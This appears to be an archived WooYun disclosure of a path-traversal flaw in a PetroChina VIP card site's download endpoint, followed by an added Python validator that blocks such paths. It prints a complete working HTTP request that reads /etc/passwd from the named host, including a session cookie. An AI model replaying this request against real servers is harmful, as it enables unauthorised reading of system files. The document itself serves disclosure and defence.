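WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles, online browsing--------http://drop.zone.ci/
2014-12-01: Details reported to the vendor; awaiting vendor action
2014-12-06: The vendor chose to ignore the vulnerability; details disclosed to the public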
GET /d/download/?fileName=../../../etc/passwd HTTP/1.1
Referer: http://vipcard.petrochina.com.cn:80/
Cookie: JSESSIONID=0000qxjZ61Nwj39N7iOFeTVqcVj:14png122d
Host: vipcard.petrochina.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

[Response: contents of /etc/passwd]
Nothing more to say; you should understand.
Severity: No impact (ignored by vendor)
Ignored at: 2014-12-06 20:40
None yet
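A server-side check that would refuse the fileName value in the request above, as an added example that is not part of the original report or the vendor's code. The function name, the download root and the sample files are assumptions constructed for illustration.

```python
import os
import tempfile

class UnsafePath(ValueError):
    """Raised when a requested name would resolve outside the download root."""

def resolve_download(base_dir: str, file_name: str) -> str:
    """Map a user-supplied fileName to a real path inside base_dir, or raise."""
    if not file_name or "\x00" in file_name:
        raise UnsafePath("empty name or NUL byte")
    if os.path.isabs(file_name):
        raise UnsafePath("absolute path")
    root = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks, so the containment check
    # is made on the location that would actually be opened.
    target = os.path.realpath(os.path.join(root, file_name))
    if os.path.commonpath([root, target]) != root:
        raise UnsafePath("resolves outside download root")
    if not os.path.isfile(target):
        raise FileNotFoundError(file_name)
    return target

def demo() -> dict:
    """Run the check on constructed inputs in a throwaway directory."""
    names = ["card.pdf", "sub/../card.pdf", "../../../etc/passwd",
             "../secret.txt", "/etc/passwd", "link.txt"]
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "downloads")   # constructed download root
        os.mkdir(root)
        secret = os.path.join(tmp, "secret.txt")  # file outside the root
        for path in (os.path.join(root, "card.pdf"), secret):
            with open(path, "w") as fh:
                fh.write("sample")
        # A symlink inside the root that points outside it.
        os.symlink(secret, os.path.join(root, "link.txt"))
        for name in names:
            try:
                resolve_download(root, name)
                results[name] = "served"
            except UnsafePath as exc:
                results[name] = f"rejected: {exc}"
    return results

if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name!r}: {outcome}")
```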